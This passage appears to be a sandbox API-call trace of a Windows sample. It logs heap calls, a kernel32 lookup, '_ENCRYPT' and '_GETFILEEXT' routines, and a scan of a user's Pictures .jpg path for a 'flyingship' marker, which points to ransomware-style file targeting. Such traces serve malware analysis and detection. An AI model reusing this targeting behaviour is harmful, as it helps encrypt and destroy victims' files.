Size=0x4) returned 0x8e18c0 [0191.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0191.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0191.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0191.287] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0191.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0191.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0191.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0191.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0191.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0191.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0191.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0191.288] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0191.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0191.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0191.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0191.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0191.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0191.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0191.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0191.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0191.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0191.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0191.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0191.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0191.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0191.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0191.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0191.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0191.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0191.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0191.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0191.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0191.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0191.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0191.289] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0191.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0191.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0191.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0191.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0191.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0191.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0191.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0191.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0191.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0191.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0191.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0191.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0191.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0191.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0191.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.289] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0191.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0191.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0191.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd558 [0191.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd558, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0191.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0191.290] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0191.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0191.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0191.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0191.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0191.290] CloseHandle (hObject=0x160) returned 1 [0191.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0191.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0191.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0191.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0191.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0191.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0191.291] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0191.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0191.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0191.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0191.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0191.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0191.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0191.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0191.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0191.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0191.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0191.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0191.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0191.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0191.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0191.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0191.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.292] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0191.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0191.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0191.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0191.292] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.292] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0191.292] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.292] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0191.292] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0191.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0191.292] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.292] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.292] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.292] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23400e00, ftCreationTime.dwHighDateTime=0x1d5e310, ftLastAccessTime.dwLowDateTime=0xe7155b40, ftLastAccessTime.dwHighDateTime=0x1d5e5dc, ftLastWriteTime.dwLowDateTime=0xe7155b40, ftLastWriteTime.dwHighDateTime=0x1d5e5dc, nFileSizeHigh=0x0, nFileSizeLow=0x103c4, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="oNhYsixG5vZ 1mhk2TaA.jpg", cAlternateFileName="ONHYSI~1.JPG")) returned 0x90add8 [0191.293] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0191.293] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.293] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23400e00, ftCreationTime.dwHighDateTime=0x1d5e310, ftLastAccessTime.dwLowDateTime=0xe7155b40, ftLastAccessTime.dwHighDateTime=0x1d5e5dc, ftLastWriteTime.dwLowDateTime=0xe7155b40, ftLastWriteTime.dwHighDateTime=0x1d5e5dc, nFileSizeHigh=0x0, nFileSizeLow=0x103c4, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="oNhYsixG5vZ 1mhk2TaA.jpg", cAlternateFileName="ONHYSI~1.JPG")) returned 0x90add8 [0191.293] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0191.293] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oNhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NhYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hYsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YsixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ixG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xG5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vZ 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Z 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" 1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mhk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hk2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k2TaA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.296] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 